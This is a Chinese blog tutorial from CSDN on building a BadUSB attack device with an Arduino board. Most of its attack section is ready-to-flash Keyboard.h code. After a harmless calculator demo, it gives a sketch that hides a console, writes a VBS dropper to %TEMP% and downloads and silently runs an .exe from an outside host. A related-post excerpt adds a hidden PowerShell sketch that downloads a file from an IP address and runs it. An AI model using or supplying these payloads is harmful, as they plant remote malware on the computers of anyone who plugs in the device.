IOT黑客入门篇之初探Badusb

已于 2023-05-12 15:39:51 修改
阅读量2.8k 收藏 18
点赞数
分类专栏: IOT安全 文章标签: 物联网 网络 网络安全 安全
于 2022-11-14 17:10:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45329947/article/details/127810361
版权

什么是Badusb?

  BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击。例如,USB 闪存驱动器可以包含可编程的Intel 8051微控制器,该微控制器可以重新编程,将USB闪存驱动器变成恶意设备。
BadUSB 攻击是在 2014 年由Karsten Nohl、Sascha Krißler和Jakob Lell在一次Black Hat演讲中首次披露的。演讲两个月后,其他研究人员发布了可用于利用该漏洞的代码。2017年,USG加密狗1.0版本发布,其作用类似于硬件防火墙,旨在防止BadUSB风格的攻击。

购买一个Badusb

1.x宝
在这里插入图片描述
在这里插入图片描述

向Badusb写入恶意代码

安装烧录工具-Arduino

  Arduino是一款便捷灵活、方便上手的开源电子原型平台。其开发环境,主要包含两个主要的部分:硬件部分是可以用来做电路连接的Arduino电路板;另外一个则是Arduino IDE,你的计算机中的程序开发环境。你只要在IDE中编写程序代码,将程序上传到Arduino电路板后,程序便会告诉Arduino电路板要做些什么了

直接在官网下载
在这里插入图片描述
下载完成用管理员身份运行,让他自动安装依赖

注意:如果无法安装,可以手动下载到C:\Users\admin\AppData\Local\Arduino15\staging\libraries这个目录下面打开即可。
在这里插入图片描述
然后插入Badusb,Arduino IDE选择Badusb的端口以及对应型号
在这里插入图片描述
在这里插入图片描述
弹一个计算器

#include <Keyboard.h>

void setup()
{
      Keyboard.begin();
      delay(200);
      delay(100);
      Keyboard.press(KEY_LEFT_GUI);
      delay(100); 
      Keyboard.press('r');
      delay(50); 
      Keyboard.release(KEY_LEFT_GUI);
      Keyboard.release('r');
      delay(100); 
      Keyboard.println("calc");
      Keyboard.press(KEY_RETURN); 
      Keyboard.release(KEY_RETURN); 
      Keyboard.end();
}
void loop() {}

先编译
在这里插入图片描述然后上传即可
在这里插入图片描述

其他payload

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(300);//延时
Keyboard.press(KEY_LEFT_GUI);//win 键
delay(500);
Keyboard.press('r');//r 键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");
[//Keyboard.println](notion://keyboard.println/)("cmd");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("ECHO dim OBJsHELL  >%TEMP%/BAD.VBS");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.println("ECHO SET OBJsHELL = WSCRIPT.CREATEoBJECT(\"WSCRIPT.SHELL\") >>%TEMP%/BAD.VBS");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.println("ECHO IrETURN = OBJsHELL.rUN(\"CMD /C ECHO WGET -uRI  [HTTP://](http://106.75.249.46:9033/cOOOLIS-MS.EXE)x.x.x.x/sss.exe -oUTfILE %TEMP%/sss.exe | POWERSHELL - && %TEMP%/sss.exe  \", 0, true)  >>%TEMP%/BAD.VBS");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.println("%temp%/bad.vbs");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.println("exit");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}

void loop() {
// put your main code here, to run repeatedly:

}

使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
在这里插入图片描述

参考:
维基百科

网安君
关注
专栏目录
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2664
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 6006
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
U盘植马之基于arduino的badusb实现及思考
C20220511的博客
09-28 614
基于以上几点我们对badusb进行了改进,首先可以使用usb一转多转换器,接一个sd卡读卡器,接一个arduino,使badusb不仅是一个模拟键盘程序,同时也是一个正常的U盘。曾经有这么一段传说,在某次攻防演练时,某攻击队准备了一口袋U盘前往了目标单位的工作园区,在园区围墙外停下了脚步,然后开始不停扔U盘进去,最后发现有大量的“猎奇者”上线。BadUSB则是利用写死在固件里的代码进行一系列模拟键鼠操作,通过正规的渠道,走usb协议传输给操作系统,操作系统只会认为是一个外接键盘进行了这一系列操作。
BadUSB
weixin_30505751的博客
01-06 552
https://ducktoolkit.com/ https://shop.hak5.org/collections/bfcm2018-top/products/usb-rubber-ducky-deluxe https://github.com/hak5darren/USB-Rubber-Ducky https://www.freebuf.com/news/159942.html h...
从零开始学badusb(1)--初识badusb
azraelxuemo的博客
05-28 3844
BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备通常指的就是键盘鼠标等与人交互的设备,用户插入BadUSB,就会自动执行预置在固件中的恶意代码。 ​ Bad-Usb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。 为什么要学习badusb 怎么说呢,听网上的大佬们讲。。。badusb可以绕过杀毒什么的,反正
bad usb编译器
08-08
bad usb的编译器,欢迎下载。 Digispark Digispark是一个基于ATTINY85微控制器的开发板,体积小且价钱便宜,功能方面则没有Arduino般强大。代码与Arduino大同小異,也是使用Arduino IDE开发。 Digispark是Digistump LLC (digistump.com)版权所有,请使用者仔细阅读Digispark使用协议和版权声明 Digispark的特别之处是使用了USB与电脑沟通,省了USB至串口转换器。为此,Digispark必须占用2KB的快闪记忆体(Flash Memory)以便用来安装Bootloader。 Digispark的功能 打开Examples,大概知道Digispark的功能到达什么程度了。麻雀虽小,五脏俱全。
Bad usb实现U盘攻击
qq_40624810的博客
09-18 7264
1、Bad usb介绍及原理 介绍 BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...
BadUsb制作
最新发布
weixin_43893278的博客
03-09 721
badusb制作
EVB_M1串口调试NB-IoT入门篇1
08-03
【EVB_M1串口调试NB-IoT入门篇1】是关于物联网技术中使用EVB_M1开发板进行NB-IoT模组BC95的初步调试教程。NB-IoT是一种窄带物联网技术,常用于低功耗、广覆盖的物联网应用。 在开始调试前,需要正确连接EVB_M1...
SRLabs-BadUSB-Pacsec-v2.pdf
07-30
【标题】:SRLabs-BadUSB-Pacsec-v2.pdf 【描述】:这份文档主要探讨了"邪恶女仆"(BadUSB)攻击场景,其中攻击者通过篡改USB驱动,使大容量存储设备被主机误识别为USB键盘,以此来实现对目标主机的数据窃取。 ...
badusb_badusb_
09-29
badusb资料,需要自行打包带走
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
badusb代码.zip
07-25
分享一款badusb的代码,测试过还是可以正常使用。希望帮到有需要的小伙伴。
rpi-iot-hacks:树莓派上的 Windows 10 IoT 黑客项目
05-31
本篇文章将深入探讨一个名为“rpi-iot-hacks”的项目,该项目专注于利用树莓派搭载的Windows 10 IoT操作系统进行创新实践。让我们一起走进这个独特的黑客项目,了解如何借助JavaScript编程语言,在树莓派上实现一...
NB-IoT规划目标及规划思路初探.docx
04-19
### NB-IoT规划目标及规划思路初探 #### 一、引言 随着大数据时代的到来,物联网IoT)已成为移动通信领域的关键技术之一。据预测,至2020年,全球物联网市场连接数将达到500亿,其中中国市场预计将突破100亿连接...
NB-IoT规划目标及规划思路初探.pdf
04-19
【NB-IoT规划目标及规划思路初探】 NB-IoT( Narrow Band Internet of Things,窄带物联网)是物联网领域的一种重要技术,其规划目标和思路对于构建大规模的物联网网络至关重要。NB-IoT旨在满足物联网设备的特定...
BadUSB攻击
qq_45391176的博客
09-08 2329
一文读懂Bad USB
u盘插在电脑上没有反应_插一个U盘黑一台电脑Badusb最详细制作教程
weixin_39999536的博客
11-06 1071
文章来源:重生信息安全文章作者:J0o1ey0x001-简介概述在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态2.Badusb内部结构从这张图便可以了解到--Badusb和普通的U盘并没有什么两...
badusb和openwrt
mcc的博客
05-18 747
badusb和openwrt 1.badusb 首先想说明一下的是这两个技术都是开源的,badusb几年前就已经发布过了,现在依然没有没有足够好的解决方案。说的通俗一点其实就是一个单片机系统,有点类似于鼠标等外接设备。看过相关的payload,其实就是模拟相关的键盘敲击,自动执行相关的cmd命令,从而实现对电脑的自动化攻击。下面以一个简单的payload进行讲解。 # Arduino——leo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值